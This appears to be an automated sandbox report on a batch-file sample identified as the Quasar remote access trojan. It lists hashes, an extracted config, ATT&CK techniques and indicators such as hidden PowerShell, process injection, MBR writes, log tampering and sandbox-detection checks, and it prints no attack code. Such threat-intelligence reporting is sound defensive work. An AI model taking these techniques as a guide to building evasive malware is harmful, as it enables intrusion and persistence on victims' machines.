quasar | adf4074b727b1f4914e3d1bd154f5d8672d16688960a77d4262e2c620cf7f890

Analysis

max time kernel
130s
max time network
130s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
01-01-2025 03:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Loli.bat
Size

7.2MB
MD5

b052451fc18d2a15c1d83312b55d09a3
SHA1

81ed7f80a894ceaca01153920d3b5e73f593d6a5
SHA256

adf4074b727b1f4914e3d1bd154f5d8672d16688960a77d4262e2c620cf7f890
SHA512

9102cea466aa291c2df1a4f2d69d4cfe71ef7c7dd048f17719757ed317e80b192337894d59c04fdb95c9c92fc1b0568f2049960ee927bc66d6b421e089a8a659
SSDEEP

49152:zHRDNbQ4h2m6rQA3V8VxkTxV824RWYDQhM84IU6ZGnxb6szVaeB8bOYxs4ztgyUv:F

Score

10^/10

quasar bootkit defense_evasion discovery execution persistence spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

encryption_key
03816C045CDE13385E227545D99CA4F0BBE6CC9F
reconnect_delay
3000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral1/memory/2804-1873-0x0000026444110000-0x000002644487E000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 1404 created 596	1404	powershell.exe	5
PID 2804 created 596	2804	powershell.exe	5

Blocklisted process makes network request 5 IoCs

flow	pid	Process
26	2804	powershell.exe
51	2804	powershell.exe
55	2804	powershell.exe
79	2804	powershell.exe
84	2804	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1404	powershell.exe
2804	powershell.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p"	WaaSMedicAgent.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Executes dropped EXE 1 IoCs

pid	Process
5296	GjnHVH.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx	svchost.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	wmiprvse.exe

Drops file in System32 directory 15 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	lsass.exe
File opened for modification	C:\Windows\System32\Tasks\$nya-YJ6g7pg3	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1404 set thread context of 4256	1404	powershell.exe	100
PID 2804 set thread context of 5932	2804	powershell.exe	118

Drops file in Windows directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\$nya-onimai2	powershell.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File created	C:\Windows\$nya-onimai2\GjnHVH.exe	powershell.exe
File opened for modification	C:\Windows\$rbx-onimai2	powershell.exe
File created	C:\Windows\$rbx-onimai2\$rbx-CO2.bat	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018C010A62E6857 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb0100000041b27748aa4b8a4397005b38cc2abb720000000002000000000010660000000100002000000017b18fb65bee7bd4581abcf44a81cf5c95a7c07273e55426aed3373e45dc6890000000000e800000000200002000000006951071dc3d2cd2e1360edef2ad42ed2e8b76f687eb17782c3bea6b69fc56bc8000000084dbb8b5489cc864f3c551e7897b906d981311c02c4aaf840c648cdde69fc3cc8b7c64a4390150c181e7d83380f1b3602fc3840dc0f84b1994e585824e8866c2b2f17afa70d18c4098ddd8224b632492350f413939100cf09b16b57fa5a501ba2519fb3d37e04f4509fb5fe0aa065cb33675d009718ad9badff56cdd7b7e0ff640000000f8279cb321cd4f525e0c09faa27a57b85a450a18176a0546cd79a0273af6bcf69ee6d0aa019310bedd1bac9bc1f545a30d71ac34e5858f5b93062c85a4007e6f	mousocoreworker.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb0100000041b27748aa4b8a4397005b38cc2abb72000000000200000000001066000000010000200000002d6320ccb03ab5119d4101d79d42955db99a57821b0a04357e574f4d8ad2817c000000000e8000000002000020000000b8d6b86dd6c8f94ab251990fb9f4c3d47fb0d3b535e5fb053bbd063ff2c11b17b0030000245dcb00339a6a09729a5a90377688007defcaf35c659d89164559e5371838d35a73da1da77fb82f9d09a8b7587d15b3d2bca2bf045bf3b6d577798eb01c5fdce71a9a5c7e9a70d7c91278314d4adc99d83de7698a7485206ebe6323956c5b09b1a59b8f1dad5b2a0fef2b2bfb590fabd77caf390ae86106ec2e263134774474ce4f9f4374653d466cc702f94682afa0abe194c13c9ab551477354dea1130ec59c9dbe13580fc58b12d0de7206ddbd41ef65b91e8965c375ef111b164af5f77813539d42b3dac41ba66de40ac8596f0127371ce4aad930a70f41707e161988b8d47e83584a49e3255e25fdf1a90979c318665310908d0c9d141e71eccc29b6b06c30e90d2aede0cc828722f0e92486d852ca5ab77cb8bcd3ab96e3d77b426f38fa7c3aa11e3ba9f0e6dcf42c25584007e0fc0f529304ba991ba1e7876c935d6d0b2df30328fe7b44fe884de378f847b9c85ba94ff9e2f39bd21bc99b9f21d11a1b9fad9492f8d04b4f968b18a217ffffd749738a262ff367550301de2498db3c872d1f94765578ecc36ea5900735a943dba737a427d4d97818701194b63c39862d6a9d091a2dbe6683a6fe5b37a9bf8a1d1b4bbde33baffeeca97fd5414b40e4e1884ff5c4fae73a347efd55442d8e5d916ff02bbb09f5e8396137aa20b73bd01583b9cc5bec8d8b9c079d67a8577e93c883a4629f57eb5a469fb9c1d809c55b49bc3624c8d7bd00f80fb696350703a8c0c4307616241e90e29b17e4b438de3bddd368497029cfe065079318ede32a7dc90b8d85dbf317cc27a569629ba399f0ab48e7d87b560e74dd044412300463923242f927c925c09d34a229321e433170fb27629c83b14fb748faa4a0ee6e3da4cbce99f2b2775f171c01acb5df6fced5451aa1bcbd7fec0104113a01d485f47ff807426a1e9b5fea2a9cb5e4c73e79a096550375b679ca8f63cfd59c4998904313ead8b73da849fdaa55e8e321706038cbd6eec01e801c9a8523ebb24cef649b786f5c6626669e844624ccd8577314929e74302f88e84d6bb3e74bae40c3e0388aa99c677247b9a7ac64cf378d35a3d24dcf8e73d8990d9b2af256fc21a26ea75ca846eefe12f5a12d7904dae050b2027742ab8d099e17979aaaa1d12977c76a5b767100daacb3e656d802b7124cb236f4a43365482324c5cb1f37fce65c37aa82cc28531391b4a519ba6b8959b7ca66582c3f39d09b6af2a29928251fc66ed8cadcc5811ada3ac296769c8303a81e0350bb3cf3a8dc04cfcc1b7f5750baf5fa60a3a182f93d5784ae684d289b706e82b3868c235757e6142a7814068cee2ca2400000008af11d61f71d71b7e75814647c6c124bd17693a8826e847c63192990f6f3b30fb72be8444c7a837183b654e2b523655655b3cbdf9a82462f771b1b1f70e63c5d	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02fsmtaivvxucroq	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\P3P = "CP=\"CAO DSP COR ADMa DEV CONo TELo CUR PSA PSD TAI IVDo OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR LOCi CNT\""	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3227495264-2217614367-4027411560-1000\02xkmddpkuqkuibf\DeviceId = "<Data><User username=\"02XKMDDPKUQKUIBF\"/></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1735703855"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3227495264-2217614367-4027411560-1000\ValidDeviceId = "02xkmddpkuqkuibf"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\Flags = "8256"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property	mousocoreworker.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02fsmtaivvxucroq\DeviceId = "<Data LastUpdatedTime=\"1735703775\"><User username=\"02FSMTAIVVXUCROQ\"/></Data>\r\n"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02fsmtaivvxucroq\DeviceId = "<Data LastUpdatedTime=\"1735703775\"><User username=\"02FSMTAIVVXUCROQ\"><HardwareInfo BoundTime=\"1735703774\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3227495264-2217614367-4027411560-1000\02xkmddpkuqkuibf\DeviceId = "<Data><User username=\"02XKMDDPKUQKUIBF\"><HardwareInfo BoundTime=\"1735703775\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\Data = "ct%3D1735703776%26hashalg%3DSHA256%26bver%3D24%26appid%3DDefault%26da%3D%253CEncryptedData%2520xmlns%253D%2522http://www.w3.org/2001/04/xmlenc%2523%2522%2520Id%253D%2522devicesoftware%2522%2520Type%253D%2522http://www.w3.org/2001/04/xmlenc%2523Element%2522%253E%253CEncryptionMethod%2520Algorithm%253D%2522http://www.w3.org/2001/04/xmlenc%2523tripledes-cbc%2522%253E%253C/EncryptionMethod%253E%253Cds:KeyInfo%2520xmlns:ds%253D%2522http://www.w3.org/2000/09/xmldsig%2523%2522%253E%253Cds:KeyName%253Ehttp://Passport.NET/STS%253C/ds:KeyName%253E%253C/ds:KeyInfo%253E%253CCipherData%253E%253CCipherValue%253EM.C534_SN1.0.D.Cr2jsuXX4Flw62aac6bsE1A5572/JiYKPlOXjVP%252BLbygtQfPuQ66HhJvtYQgofiTNC8IB5E0ng6MXYTUfYHnB1r1h6Sygmzc9DbEbYl68YSAKKWdv/iHkuHeUFsIegB7tyK/LMBH8FbZRJ5sRD2d8HUhuZv4gkcs65vZrMjWq0DyD9xvnul5gaxZbDWJ087b3fyEo%252BspRnTnwu77vODorLdAGNB67pkZXfl7epLppir6UVHSXbXAXakgqYnVuq4X1qtyi7jgjfqEhFre4QgVwHdqcNQBrXUoN85iIfeKtd4hMxM3fXlDhlKTBsUyeX2IfC9XscmTqWmWahjQVIaWkYSEfk2GNiOlPXom35m49OWtL%252BitzAVAvykeZVGR43Lc7%252Bc03uwl7JP2ME%252B9IV65yYlTx99Qzv4gu7QHtV0EZkZFo/RJ9rRvxnC5oUVo/sJumIagdXRUr2Fm1oCku0P9ABDIiyc5FV53BK4RJkrZyzlsX8ZT2305I0Q%252Bq/UXRkyb%252BFKeivrK4Y6v6PlXUgMUBKo%253D%253C/CipherValue%253E%253C/CipherData%253E%253C/EncryptedData%253E%26nonce%3DkvEIK7dXRzL5%252FmOU2w14fvMJgv14%252B7yh%26hash%3DXD6LoYjB3Esz6LjDQczTwTRZr0bo7tgxMIcvkwQv6tw%253D%26dd%3D1; path=/; domain=login.live.com; secure; httponly"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	mousocoreworker.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3227495264-2217614367-4027411560-1000\02xkmddpkuqkuibf	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	WaaSMedicAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1"	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager	mousocoreworker.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02fsmtaivvxucroq\AppIdList = "{AFDA72BF-3409-413A-B54E-2AB8D66A7826};"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\Data = "ct%3D1735703777%26hashalg%3DSHA256%26bver%3D24%26appid%3DDefault%26da%3D%253CEncryptedData%2520xmlns%253D%2522http://www.w3.org/2001/04/xmlenc%2523%2522%2520Id%253D%2522devicesoftware%2522%2520Type%253D%2522http://www.w3.org/2001/04/xmlenc%2523Element%2522%253E%253CEncryptionMethod%2520Algorithm%253D%2522http://www.w3.org/2001/04/xmlenc%2523tripledes-cbc%2522%253E%253C/EncryptionMethod%253E%253Cds:KeyInfo%2520xmlns:ds%253D%2522http://www.w3.org/2000/09/xmldsig%2523%2522%253E%253Cds:KeyName%253Ehttp://Passport.NET/STS%253C/ds:KeyName%253E%253C/ds:KeyInfo%253E%253CCipherData%253E%253CCipherValue%253EM.C534_SN1.0.D.CtLwc63/M53kfjWznXqST2/0EgGnfwh7qjS3RGTOmpKn7p6Js2Bg%252BxFWXme5Xw2CD4wWHVbgNR%252B1%252BiC5JUVfIEziD3kYR4Pxq6JEPa8MQQSAs8lB3sYQS6VDClrS4J7DPnhmXfoMutPeM/uIEIF72l/rul6Zsw1BiwSwkQ7fcNqRQIOxsYlGcM7TUc9x4CwSOh9Kc1ULS5hbepqKxM3mMSSKFq4FefBNnvkRaDYpHmyNm52ADDo00nm4aGbvITRZw3PoiqBb7C0/fiAmS3BfK6yhyMpZKDl1lJZzfBDGxGtjW91xXAAXB2jDKfvsIAFsrLQu7UuE1/xAiirRs18GZj7N1uEn0Fal8fumoxQrrC5rkFqeOcCbiEWEzg70XaZGwpGuYB1XPsl82lJYAO0LJUU9vwwonVl%252BV6bJTzyrHPTutoU56ogPmLH48jCR2BuBVkF2hRNAXLG9bHr%252BGzUWiX5NRogI0tZJ0HpfK4%252BA5HYRK//5E//ZxQeUVmsSnZu/C2g1MJA2PJDxiU0HLAmzwFE%253D%253C/CipherValue%253E%253C/CipherData%253E%253C/EncryptedData%253E%26nonce%3DkuRJar9cCBYV7DcaIoNyOzwIhKFsBaQf%26hash%3DUim7KYXcUfYfxLWdSL2ING8f1SkHNFwyhDpQ3M%252F0wL4%253D%26dd%3D1; path=/; domain=login.live.com; secure; httponly"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02fsmtaivvxucroq\DeviceId = "<Data LastUpdatedTime=\"1735703775\"><User username=\"02FSMTAIVVXUCROQ\"><HardwareInfo BoundTime=\"1735703777\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
